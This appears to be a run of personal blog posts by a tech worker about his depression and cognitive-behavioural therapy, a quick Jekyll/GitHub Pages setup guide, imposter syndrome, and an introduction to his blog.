- You have a kid? - what happens if I die
- You are happy? - that means Im gonna be sad when this period ends
- You do a good job - that means this is the new baseline and so is always expected
Every positive is a negative and it is exhausting.
So, things fell to shit big time when the company I worked for got sold. I had done well and had FINALLY found a happy place. I was happy at home, I loved my job, loved my teammates and the pay was good. See, every time its good means my life is gonna be shit and go downhill.
I took a chance and I went to Uni… I smashed it out of the park but guess what, imposter syndrome and depression are cruel.
The pressure was immense but the time was great. I became something like the person I wanted to be but by now, no one needs me.
Children are grown up, my wife is not interested. This is probably because things in life and I had changed, and without talking you ain't gonna know where people are mentally/emotionally.
Some of this sounds uncoordinated, but that is the mindset, like a ping pong ball in the mind.
So what now. I get a job in a cutting edge tech company and it is very different from my old life and makes a huge personal change. Anyway, these new workspaces are very different from my old space and openess is a thing.
I found I am really good at advising others and found that I was a good listener. I was speaking to a workmate one day and they were telling me about their depression then out of blue he said "do you take medication for your depression?". OMG. I had never spoken of my issues and so was taken aback and that made a crack in the dam.
Times had changed and it was easier to be open but old habits die hard and I couldnt tell people of my struggles. As far as I was concerned, its embarrassing to be weak emotionally (my perception).
Oops
One day I was talking to a medical professional on behalf of my son and inquired about mental health therapy that was advertised and I had a brief moment of feeling happy to speak about being fed up with feeling low.
I immediately regretted it and became embarrassed. I had issues from my childhood, issues from my teens, issues long after, all had been greyed out and hidden away but I also really felt that there was no point in life.
The medical professional just happened to be a mental health therapist, taking time away from therapy (They take time off as it can be quite taxing to be a therapist), and I was immediately assessed.
Its kinda lucky as I would of backed out if I had a chance, so being immediately assessed, I couldn't and a week later, I was in front of my therapist. cognitive-behavioural therapy (CBT) was the chosen therapy.
What was involved?
Quick version: You dont get treated. You get taught to address thoughts in a different manner and are helped to treat yourself.
Longer Version: CBT, or cognitive-behavioral therapy, is a type of talk therapy that is used to treat a variety of mental health conditions, including depression, anxiety, and PTSD.
CBT is based on the idea that our thoughts, feelings, and behaviors are interconnected, and that by changing our thoughts and behaviors, we can change the way we feel.
CBT is typically conducted in a one-on-one session with a licensed therapist. During a CBT session, the therapist and client work together to identify negative thought patterns and behaviors that may be contributing to the client's mental health concerns. The therapist then teaches the client strategies to challenge and reframe negative thoughts, and to replace unhelpful behaviors with more positive ones.
For example, if someone with social anxiety is afraid to attend social events because they believe they will be judged by others, the therapist might use CBT to help them challenge this belief by asking them to think about times when they have attended social events and had positive experiences. The therapist might also teach the client relaxation techniques or social skills to help them feel more confident in social situations.
CBT typically involves weekly sessions for several months, although the length and frequency of therapy can vary depending on the individual's needs. CBT has been shown to be an effective treatment for a variety of mental health conditions, and it can be used in combination with medication or other treatments for optimal results.
So, i am going to pass on some of the tools given to me. Like many things, there are many tools in the therapy box of tricks, what works for you may not work for someone else. Therefore, you may need a butter knife to undo your screw, ill use a chisel, others may need the flathead screwdriver.
A term also used is talking therapy and this is where it starts, Talking.
NOW, I had always been very cynical of therapy but, you end up speaking to someone that is invested in you and its surprisingly easy to talk.
So why is this different than talking to a pal.
If you talk to a pal/partner, they care deeply, and they wish to help, they want to fix the issue. Your therapist doesn't, they want to give you the tools to fix it.
“ Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime." “
Workpal Example.
- You:
Bob, How do you do so and so? - Bob:
Here are mate, Give it here, I\'ll do it
Problem solved - It is done with care and compassion but you are not any further forward
With CBT, tools are offered to help you and here are a couple that helped me.
One is chatting and having no direct feedback. The received theme from my point of view was that my emotions were questioned and where needed, challenged or affirmed.
To give an example, lets try when questioning your job abilities.
Chatting: I may express the thought that im not good enough to do my role.
This isn't affirmed, nor is this challenged. This would now create a number of questions of why you feel this way, what qualifies you for the role, how did you get the role, what have you done that is good, what have you seen go wrong, pro's v cons's.
Another tool is the perception report.
This asks you to record a feeling or emotion, measure your feelings at this time, thoughts or feelings around this and then a number of differing perceptions. Here is what an entry would look like.
- Feeling :
My partner didnt say they loved me when I ended our phone call - Emotion and Measure :
Sad 60%,angry 70%,questioning 20% - Thoughts or Feelings :
I always say I love them, is that not important to them?,Why dont they care, are my emotions not important to them,They have been distant, have they found someone else? - Perceptions :
This is built around a set of asks :- What would a person who cared for themself think or say
- When you are 80, will it matter
- What three good things could come from this
- What would a close friend say…..
Your answers could be:Will this matter when your 80? Well they say it most times so in the scheme of things, prob notWhat could come as good? Its a sign that it is no longer just a habit but said when meantIt will mean more when it is said
There are a lot of other perceptions and these can be considered with your therapist, this allows you to explore the answers and push the questions more but, it is a helpful thing to do with or without a therapist.
Is it intrusive? You could fill this in at the time that each thing occurs but ultimately, you could do it twice a day eg dinner and bedtime or even just like a diary and once a day… I hear you say but I might miss some bits.
Well if you dont remember it at nighttime, does it really matter? One other benefit is I always seemed to have a busy mind and my sleeping pattern was awful: Writing you day down, plans for tomorrow, worries, allows you to clear your mind and sleep better.
If you then assess the list yourself once a week, you can see what really matters, you may see that with a change in perspective, actually, all the negativity can be changed to positive.
Lets take a look
Your partner didnt phone on a night out.
Lets go negative :(.
They are having intimate time with another person, they dont care about me and have forgotten me, They are drunk and vulnerable.
Lets now switch :
They are having fun and you should be happy for them, They love you so much they dont need to be attached at the hip and will love you more.
Just this switch can change so many things. Repetition is the key to challenging the auto response you have to a scenario.
Just visiting a note from earlier regarding my going to uni and my wifes distance or perceived none interest. One thing my therapy taught me was its not all about you :D. Think why, think about others thoughts and how this can effect them and then you. To place myself in my wifes shoes (she has smaller feet so its difficult :D). The husband that has for so long been on a linier path, steady, you know whats happening from one week to the next. All this has changed. They have a new set of friends, all young, they are looked upto, they are going out more, they are changing. How scary must that be for her.
Final Bit
Only you have control of you. Small changes you make can make huge changes to your life.
My last bits of advice:
- Therapy will hurt and bring up things you have buried or dont want to cover
- don't make it secret.
Ouch
I dont want to cover all my things but we all have baggage. You will cover this, you will pick up the box, open it, look inside and repackage the goods in a better way. To make an example, imagine if the box is childhood. Your perception would be from a childs POV. Now youre an adult.
You will have a very different perception now, you can re-assess.
You will be given chance to talk it over, work in through and make peace with the box.
You will also find better ways to deal with life in general.
Inform
Your therapy should not be a secret. Ok, you dont need to be that person that is telling everybody like they have a special badge. No one really cares but let your partner know whats going on.
Imagine if you nightly walk into the kitchen and ask your partner if they need help making dinner.
They reply no thanks.
You respond with slight hurt that you'd like to help but they just advise that they want to do it on their own…
you sulk away in a huff.
Now after some therapy, you've realised that this making dinner time is “their” wind down time and letting them unwind is good
So, now you change and you ensure that they know you'd like to get involved and you love them and they only need to ask and you'll be there.
If you dont make them aware, it would be a huge shock to your partner if they didn't know you are taking therapy and some changes may happen.
Like many things, you get out what you put in.
Keep safe, look after yourself and remember, if you had a bad back, you would go to the doctor. Well a bad mental state is no different.
![]()
Create your own blog
GitHub and AWS R53!
Want to have a bash at creating a blog?
Well, this isn't the first time I've thought about creating a blog.
I had previously looked at using HUGO. This worked well, and I wrote a few bits but never published them. I just never continued and have since thought about it a number of times.
So this time, as I'd forgotten what I'd used last time, I was looking for a static page blog creator. WordPress came up as an option (yeah, slap me). I decided to use AWS and here I started looking at setting up an EC2, R53, EIP, RDS, etc. I wanted to be a smarty‑pants so, stupidly, started writing the Terraform to do this. Advice: that is dumb when you are working out how something is made. Create a POC (proof of concept), get that all working and then start writing Terraform.
Whilst looking at an error and creating the repository on Git, I came across Jekyll. Another learning point is the overwhelming desire to follow a path that you start down. Get out of being precious – you're not always right first time.
So I swallowed my pride and started to look at Jekyll. It was so easy: download, execute, and test. Add to that I found that there are loads of themes you can find and these were just as easy – download and you're more or less done.
Simples
So this isn't an in‑depth guide but a great starter.
The Jekyll website has great walkthroughs so I would be doing them an injustice by trying to recreate that, but I will give you the VERY quick and easy way.
Prerequisite: a GitHub account.
- Hit the Jekyll Themes website.
- Select any theme you fancy.
- Go to GitHub and create a repository
name.github.io(GitHub walkthrough). - Push the code up to the repo / upload the code manually.
- Now your website should be up and running.
Well that was easy, wasn't it.
Now, how do we edit this? If you open the _posts folder in the code you will see a bunch of test blogs.
The date then name is advised, e.g. 2023-04-21-name-of-file.markdown.
You will see that the start/head of the file will contain:
```markdown ** title: “The Title Which Is Shown On The Main Page” subtitle: “Sub Title to Title Headline” author: “You I Guess :D” avatar: “img/authors/you.jpg” image: “img/blogimage.png” # Image shown on the blog icon date: 1999-01-01 # Date shown on the page tags: website R53 github webpage gitpage # Some tags \O/ **
![]()
Imposter Syndrome – Really
Is it just me – no!
Imposter Syndrome – really, I'm sick of hearing about it.
Yeah, everybody has jumped on this bandwagon. Everyone is soooo vulnerable and precious.
Well, not everybody is. I've met a few characters in tech. My original exposure was to a lot of people who were helpful, genuine, and a real team. This is me looking back to see the bigger picture.
As time has gone on, I've met some that really are just imposters. They plough through life by ignoring they're wrong, just bullying, not listening to others, and making the same mistakes again and again. This will make you very good at doing what you do and then moving on before you are found out. That is not imposter syndrome; this is a very different thing.
In my original exposure to the tech scene, all people were unique but understood that you can't know everything. For the first time, having people that I see as geniuses ask for my help was the time I shit myself. Well, this is one of the moments when I felt like an imposter.
When did I see it for the first time?
I had never heard the term “imposter syndrome” until one day a friend at university said they felt I was a big sufferer.
What is the syndrome?
Try this link: Very Well Mind – Imposter Syndrome
or
try this: Mike Cannon-Brookes, an ultra‑successful guy, who lets you in on how being clever or successful can knock you.
I'd worked and been successful before university. I was older than everyone in my cohort. This really adds pressure. I couldn't fail; it was so important that I didn't get it wrong.
I was lucky that I met some very clever people. I felt out of my depth (as you should at university). I thought that these people were carrying me. They said I was helping them and excelling in some areas. This was very hard for me to believe: surely I was lucky (lucky, fluked, liked ← all terms you use to dismiss that you're actually very good and/or learning a lot) and that part was an easy bit that I knew, or I had done something similar. There are so many reasons you can get in your head to dismiss success.
I got my job, I did well, and I still excel in this role. This isn't how I felt, though.
I have, after a number of years, learnt to get a grip on this runaway self‑sabotage.
But look at those people who are super confident
Have you seen that person who tells everybody how good they are? They really believe it. At first, you may believe them, but then you see that they are not quite as good as they think!! This is the Dunning–Kruger effect. Put simply, you may have heard that term “a little knowledge can be dangerous”. Well, here it is: they are blown away by their knowledge and think they are creating magic. Well, I won't knock that, as I too have been amazed by what can be done, BUT this is where we diverge. I see how far I've come, but I also see how much I don't know.
The other person just doesn't see the upcoming learning curve. As a now‑experienced techie, I see these newbies come in, and I like that excitement, and I would always encourage these people to keep learning.
This is also where I explain my struggles with imposter syndrome. They are generally knocked sideways because they see me as a goal (I'm looking at what they are achieving and thinking “wow”, too).
That is exactly what I want to explain. Nice, clever, genuine, honest people know what they know; they also appreciate the effort and work that goes into learning and will always appreciate those around them. They know where they are going and where they have been. They are open and caring to those coming up behind them to join the tech team. That can also expose them to imposter syndrome as they are held up high.
Eventually they get comfortable knowing that the journey of learning will never end (just as you think “I've got this”, you find something that slaps you around the chops and makes you humble again). They do get comfortable with what they know, as subject‑matter experts, and with knowing that they can't know EVERYTHING, and they get happy with saying, “I don't know”. They are also happy to realise, as my ex‑boss told me, that you ain't employed because you know it all, but because of your ability to – and that there is a lot more to you than just what you know.
Did you get the job because you are a genius or because you are nice? Probably both. If you knew nothing, you wouldn't be where you are, but if you know a lot and people can work with you, that's better than a genius who is arrogant, can't hold a conversation, etc.
Now, I am never going to tell you how to control your self‑doubt, how it happens, or what to do for you, but I can share about me, and maybe that can help. Mostly, remember that you're not alone. Honestly, unless it has gone to their head and they've become arrogant (again, is that a manner to protect themselves from being found out in their minds?), all those people have doubts too. They may have worked through it and become comfortable with it, but they all suffer.
So
Well, my point is that imposter syndrome is nothing special; it doesn't make you different; it actually makes you just like everybody else. Do you breathe? Well, so does everybody else.
We now have a name for a natural thing; it is what drives you on, makes you humble, and makes you a nicer person.
None of this is to dismiss the feeling – it is real – just know, if there is someone you can share this with, do it. If there isn't, know that almost everyone is feeling the same.
Will you get over it?
Maybe, but most probably you'll just get used to feeling this way.
You'll have times when you are on fire, feel you've learnt loads, then have days when you think, “I have no idea what I'm doing.”
On those low days, look back and see all the amazing things you've done. Take a moment, have a short break, and then come back to your issue.
I've just watched Lewis Capaldi on Netflix – even he suffers.
Look after yourself, work to live; balance is the key.
Here are a few links to some resources:
![]()
Blogs are the new social!
It's all cyclic!
So, what's all this about?
Well, I have entered the tech scene and see so many blogs that I hit on a daily basis with those hidden nuggets of knowledge.
So why a blog?
As I go about my day, I have a lot of those moments where I find something that I think others may find interesting or that might get them out of a bind.
There are times when a good rant is all I need, so here we are.
Then I think others might be interested in another person's journey in tech, self‑concerns, etc.
Who am I
Entered the tech scene!!! Oh, I hear you say, another halfwit thinking they can jump on the tech bandwagon.
Well, it's not quite like that. For many years I'd had an interest in tech: lots of playing over the years, hacking websites, playing and hacking games, fixing stuff (breaking stuff), building stuff.
I've played with Windows and Linux, plus anything that I could get into. I've worked in the manufacturing scene for a long time and linked a lot of inoperable schemes together, and dropped all the way back to using Win3.1 for printing, macros in MS Office, UNIX, C#, lots of weird and wonderful tech bits.
So, opportunity knocked and I decided to go to uni and take a BSc in CompSci and Cyber Sec.
Now, I'm really in the tech scene. I work for a real tech company.
That's it. I know past stuff that I'm trying to fit into my new existence, I know new stuff that I'm seeing if it is useful, and the stuff I'm learning is the new horizon.
It's daunting, exciting, and so often I wonder, can I do this… Obviously, yeah – and I'd like to share all this with you. :D
So here we are, a new outlet for me to share with anyone who is interested (or, no doubt, talk to myself).
It will contain:
- bits of my week
- bits I've learnt
- vents about tech and goings‑on
- feelings
- weirdness
- more or less anything kinda tech‑related (or even not)
As always, the line – these opinions are all my own; they in no way constitute any link to the company I work for.
Now the dull bit is over, let me get to work on writing a blog.
So, should it be:
- SVB (Silicon Valley Bank)
- LTT – he's better looking with a beard for one, but is he a tech person's guilty pleasure to watch or a real tech god? Let's be honest, he needs to just get a grip of Linux.
- How WFH is good or bad
- Back‑stabbers
- What a tech role is and the wide range
- Women in tech and how to fix it
- Are we sick of hearing about ChatGPT – will it really put us out of work?
So many things, so short on time.
Some, dare we cover? :/
Be nice and make someone smile today.
![]()